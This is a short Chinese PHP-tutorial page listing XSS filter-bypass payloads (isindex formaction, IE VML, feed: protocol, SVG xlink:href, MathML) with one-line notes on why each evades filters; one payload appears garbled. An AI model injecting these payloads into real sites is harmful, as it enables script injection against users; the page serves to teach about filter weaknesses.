来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] isindex formaction=javascript:alert(/sogili/) type=submit HTML3与HTML5混搭xoval style=behavior:url(#default#vml);height=00;width=00 href=javascript:alert(/sogili/) fillcolor=red xmlns=/......
|
<isindex formaction=javascript:alert(/sogili/) type=submit > HTML3与HTML5混搭 x<oval style=behavior:url(#default#vml);height=00;width=00 href=javascript:alert(/sogili/) fillcolor=red xmlns=/> IE的VML中的标签. <a href="feed:javascript:alert(/sogili/)">click</a> 这个是Firefix对feed协议处理不当导致的,不知道算不算bug,但用来绕过A标签的协议检测倒是个不错的办法. <a href="javascript:alert(/sogili/)">click</a> 可以绕过不少xss filter,不过IE不支持这个实体字符. <svg><script>a�(1)</script> SVG解析script时会将其内部实体字符进行解码. <svg><script/xlink:href=data:,alert()></script> 在SVG中使用外部script时,用的是xlink:href属性,而非src. <svg><a xlink:href="javascript:alert()" href="// www.2cto.com "></a> SVG解析A标签的超链接地址时使用的xlink:href属性,所以href并未生效. <math xlink:href="javascript:alert()">xxx</math> Math,新标签,MathML规范的实现,目前只有firefox实现. |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
